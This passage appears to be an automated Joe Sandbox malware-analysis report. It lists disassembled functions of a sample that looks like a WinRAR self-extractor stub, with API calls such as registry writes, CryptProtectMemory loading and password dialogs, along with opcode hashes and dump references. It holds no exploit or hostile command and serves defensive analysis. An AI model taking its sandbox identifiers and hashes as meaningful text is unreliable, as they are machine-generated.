                                                                                  • _wcslen.LIBCMT ref: 0040D84E
                                                                                  • _wcscpy.LIBCMT ref: 0040D87C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
                                                                                  • String ID: }
                                                                                  • API String ID: 2020890722-4239843852
                                                                                  • Opcode ID: 086a18c9dfe4f33dc1eafd2f2866de13f1a7d73aa28d4a22ba3049cd17bb28b2
                                                                                  • Instruction ID: 2153274cbb330867ec567fd334d62d4a4f809a1a1ef496be9bfbb5b143e28170
                                                                                  • Opcode Fuzzy Hash: 086a18c9dfe4f33dc1eafd2f2866de13f1a7d73aa28d4a22ba3049cd17bb28b2
                                                                                  • Instruction Fuzzy Hash: E211D532E0031A59FB24BAE18C857AB73A8DF00754F50447BE600E22C1E7BC9989829D
                                                                                  Function 0040D93C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040D8FF: _wcscpy.LIBCMT ref: 0040D904
                                                                                  • RegCreateKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Users\user\AppData\Local\Temp), ref: 0040D989
                                                                                  • _wcslen.LIBCMT ref: 0040D997
                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040D9B2
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D9BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue_wcscpy_wcslen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp$Software\WinRAR SFX
                                                                                  • API String ID: 3170333323-2870035848
                                                                                  • Opcode ID: 3e31a403bdbc06c706a631c2d47d527a2151df9bc685ded264799f600b56c6e3
                                                                                  • Instruction ID: f197a405e3e2b50bf6c3819c7e75ec9d0bbb42b94066a0be0ceca9280c3341fb
                                                                                  • Opcode Fuzzy Hash: 3e31a403bdbc06c706a631c2d47d527a2151df9bc685ded264799f600b56c6e3
                                                                                  • Instruction Fuzzy Hash: 970184B6900208FFEB21AF90DC85EDA777CEB04348F104073B50472051D6745E99966D
                                                                                  Function 0040CD68 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CDC0,00000020,?,?,00405D34,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CD76
                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CD8F
                                                                                  • GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CD9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                  • API String ID: 2238633743-1753850145
                                                                                  • Opcode ID: 48996cf74afa82a78abaf954274bd4a0a105598b289ae600398f177971e3c7d5
                                                                                  • Instruction ID: 336996e79f464d0dcd4ef4225a353fac42888ac2b9566ec382fc56dfec4ad2d4
                                                                                  • Opcode Fuzzy Hash: 48996cf74afa82a78abaf954274bd4a0a105598b289ae600398f177971e3c7d5
                                                                                  • Instruction Fuzzy Hash: 30E092306007219FD7315F79A844B02FBE85FA0B10B15843FE984A3250D6BCD4518B1D
                                                                                  Function 0041DB35 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __CreateFrameInfo.LIBCMT ref: 0041DB5D
                                                                                    • Part of subcall function 0041A14B: __getptd.LIBCMT ref: 0041A159
                                                                                    • Part of subcall function 0041A14B: __getptd.LIBCMT ref: 0041A167
                                                                                  • __getptd.LIBCMT ref: 0041DB67
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 0041DB75
                                                                                  • __getptd.LIBCMT ref: 0041DB83
                                                                                  • __getptd.LIBCMT ref: 0041DB8E
                                                                                  • _CallCatchBlock2.LIBCMT ref: 0041DBB4
                                                                                    • Part of subcall function 0041A1F0: __CallSettingFrame@12.LIBCMT ref: 0041A23C
                                                                                    • Part of subcall function 0041DC5B: __getptd.LIBCMT ref: 0041DC6A
                                                                                    • Part of subcall function 0041DC5B: __getptd.LIBCMT ref: 0041DC78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1602911419-0
                                                                                  • Opcode ID: af6cece81d13520d0b2c7441276e33f7147c1f684f1e713e3537a2df1d571309
                                                                                  • Instruction ID: d40156fbb06398827007b4612525155ab4241814e2ccc79b1cfdb33acf50bed0
                                                                                  • Opcode Fuzzy Hash: af6cece81d13520d0b2c7441276e33f7147c1f684f1e713e3537a2df1d571309
                                                                                  • Instruction Fuzzy Hash: 011114B5C00309EFEF00EFA5C545AED7BB1BB08318F10806AE814A7251EB388A95DF59
                                                                                  Function 0040D4FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D55C
                                                                                  • CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D583
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharUpper
                                                                                  • String ID: -$z(D
                                                                                  • API String ID: 9403516-2779374180
                                                                                  • Opcode ID: 322997d501721ccd47298accbd0f5cb0389bfe0bdafe9c4513dd669b40413162
                                                                                  • Instruction ID: eaa5a1cd4c19a0d7a28c75e539a39726096dd450fe4c3503d3caa4b27a1afbea
                                                                                  • Opcode Fuzzy Hash: 322997d501721ccd47298accbd0f5cb0389bfe0bdafe9c4513dd669b40413162
                                                                                  • Instruction Fuzzy Hash: 9D21F9B5C00114A5DB2067A98D157BA76B8FB49348F084477E648B22C1EA7DCECC9BAD
                                                                                  Function 00406794 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406799
                                                                                    • Part of subcall function 00402C8F: __EH_prolog.LIBCMT ref: 00402C94
                                                                                  • SetFileSecurityW.ADVAPI32(00000000,00000007,?,?,?,?,00000000,00000000,00406E51,00000000,?,?,00407680,?,?,?), ref: 00406821
                                                                                  • SetFileSecurityW.ADVAPI32(?,00000007,?,00000000,?,00000800,?,00407680,?,?,?,?,?,00000000,004082BC,?), ref: 00406848
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileH_prologSecurity
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 2167059215-639343689
                                                                                  • Opcode ID: 48b2ca3c49c80d20e2fc4024aded728548127d9095e35a6bbedeec348b9416bb
                                                                                  • Instruction ID: e7245363570c746e390b2e556e5cb09005819ea418c64774127356a72507b5e9
                                                                                  • Opcode Fuzzy Hash: 48b2ca3c49c80d20e2fc4024aded728548127d9095e35a6bbedeec348b9416bb
                                                                                  • Instruction Fuzzy Hash: 0221A571D01259BADF21AB55DD02FEF7778AB44758F00807BB801B62C1C7BC8A918BA9
                                                                                  Function 0040E062 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0040E098
                                                                                  • DialogBoxParamW.USER32(GETPASSWORD1,?,0040D327,?,00000007), ref: 0040E0DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: DialogParamVisibleWindow
                                                                                  • String ID: GETPASSWORD1$z(D$z(D
                                                                                  • API String ID: 3157717868-2824312538
                                                                                  • Opcode ID: 53f267fc36ee3481627d632a4eb255c730b28eb151ca7ec6d68e20c6ef5cd4e9
                                                                                  • Instruction ID: 51c1217aef4cb495cb8589b2c496236dd520fe36134e174fb0fb718cf5f8f4d9
                                                                                  • Opcode Fuzzy Hash: 53f267fc36ee3481627d632a4eb255c730b28eb151ca7ec6d68e20c6ef5cd4e9
                                                                                  • Instruction Fuzzy Hash: DA1136357002586BDB21DF22EC41B963B94AB08354F08407AFE446B2D1C7FD8C61C76D
                                                                                  Function 0040D29E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D2E1
                                                                                  • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0040D2F7
                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D311
                                                                                  • SetDlgItemTextW.USER32(?,00000066), ref: 0040D31C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$Dialog
                                                                                  • String ID: RENAMEDLG
                                                                                  • API String ID: 1770891597-3299779563
                                                                                  • Opcode ID: cd36966036f057736dd1771b6cc502c1549ff0f51a1a555564a1fb96c05903df
                                                                                  • Instruction ID: 75ef9591e8253b42b5373d5ca3b82e7daeb80745ab2f677ec411a0b33c93f86c
                                                                                  • Opcode Fuzzy Hash: cd36966036f057736dd1771b6cc502c1549ff0f51a1a555564a1fb96c05903df
                                                                                  • Instruction Fuzzy Hash: 0101B931A4021877DA205F959C01FBB3B24EB49B50F500036FE05B61D0C67AD8169BAE
                                                                                  Function 0041D884 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041D89E
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 0041D8AF
                                                                                  • __getptd.LIBCMT ref: 0041D8BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: MOC$csm
                                                                                  • API String ID: 803148776-1389381023
                                                                                  • Opcode ID: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
                                                                                  • Instruction ID: c5fb4fdb3a7f7b462572c42264a39ca6eb13578a0b8994a5cbe4e27ea8dda9e5
                                                                                  • Opcode Fuzzy Hash: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
                                                                                  • Instruction Fuzzy Hash: 29E01A79900204CFE710BA6AC146BE93395BF49719F1904A6E81CCB363D72CD8C0954B
                                                                                  Function 00421957 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00421963
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __amsg_exit.LIBCMT ref: 00421983
                                                                                  • __lock.LIBCMT ref: 00421993
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004219B0
                                                                                  • InterlockedIncrement.KERNEL32(02271680), ref: 004219DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: b0d3f63828b5cfb6d9069d35582233ade97930143943850f8fa50f52d1c606e6
                                                                                  • Instruction ID: ec1499f8a426fb9fe9e0fc235175006b4091121507bcf51e277259ebcf926f30
                                                                                  • Opcode Fuzzy Hash: b0d3f63828b5cfb6d9069d35582233ade97930143943850f8fa50f52d1c606e6
                                                                                  • Instruction Fuzzy Hash: 0701A571B00631ABC720AF56A41575A77A07F14724FC0013BE840673A0CB3C69C2CBDD
                                                                                  Function 00411BF2 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00411BFA
                                                                                  • _wcslen.LIBCMT ref: 00411C0B
                                                                                  • _wcslen.LIBCMT ref: 00411C1B
                                                                                  • _wcslen.LIBCMT ref: 00411C29
                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,00000000,?,?,00000000,?,00409E80,__rar_,00000000,00000006,00000000,?,?), ref: 00411C46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CompareString
                                                                                  • String ID:
                                                                                  • API String ID: 3397213944-0
                                                                                  • Opcode ID: 402c9e037a8e36377aa436ee656740b5283ee8deeb51acbdbcedc5979b7533d9
                                                                                  • Instruction ID: abe1653b164107158e89de6b45f0ece219b8340a50baad52ac8984fcfd39dd16
                                                                                  • Opcode Fuzzy Hash: 402c9e037a8e36377aa436ee656740b5283ee8deeb51acbdbcedc5979b7533d9
                                                                                  • Instruction Fuzzy Hash: 28F0903218D058BFDF226F51EC01CDE3F26DB41378B204027FA1599061DA75C9E297D9
                                                                                  Function 00416516 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041651B
                                                                                    • Part of subcall function 00412779: _realloc.LIBCMT ref: 004127D1
                                                                                    • Part of subcall function 0041A60A: _malloc.LIBCMT ref: 0041A624
                                                                                  • _memset.LIBCMT ref: 0041676B
                                                                                  • _memset.LIBCMT ref: 00416925
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog_malloc_realloc
                                                                                  • String ID:
                                                                                  • API String ID: 1826288403-3916222277
                                                                                  • Opcode ID: 993cab7651194f6cca991424da9619a149d7841471cf869c5e164fbba605c5c6
                                                                                  • Instruction ID: ddebc8fec3c6ab1ead21f9829a9e2403fb97e8277fe63da2cbd278d94539d8b0
                                                                                  • Opcode Fuzzy Hash: 993cab7651194f6cca991424da9619a149d7841471cf869c5e164fbba605c5c6
                                                                                  • Instruction Fuzzy Hash: F3E1BE71A00705AFCB10DF64D980BEAB7F1FF58308F01482EE926A7281D779E995CB59
                                                                                  Function 004188B2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy
                                                                                  • String ID: T
                                                                                  • API String ID: 3048848545-3187964512
                                                                                  • Opcode ID: 79ad74f97b42cc498bbc32c67b2780474f21ab2e3d6a4d420f59f7612b1c61e7
                                                                                  • Instruction ID: 56248ae07488cb14654fd59db7a23fa1b7085feb08485c9a78f470abd0ec5a61
                                                                                  • Opcode Fuzzy Hash: 79ad74f97b42cc498bbc32c67b2780474f21ab2e3d6a4d420f59f7612b1c61e7
                                                                                  • Instruction Fuzzy Hash: 06911BB1604744AFDF24DF64C844BEAB7F9AF04304F0441AFE5599B282CB78AAC4CB65
                                                                                  Function 00406C82 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406C87
                                                                                  • _wcscpy.LIBCMT ref: 00406CBD
                                                                                  • SetFileTime.KERNEL32(?,?,?,?,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000), ref: 00406DDD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileH_prologTime_wcscpy
                                                                                  • String ID: :
                                                                                  • API String ID: 26009825-336475711
                                                                                  • Opcode ID: 87475168d9c499826015b4c01a309912094e0b8783f934e6e45cde200616d67f
                                                                                  • Instruction ID: 10d0c6f37f956a04eead57f3373f39a247be9c3eea7dabf34bffac723fae9b53
                                                                                  • Opcode Fuzzy Hash: 87475168d9c499826015b4c01a309912094e0b8783f934e6e45cde200616d67f
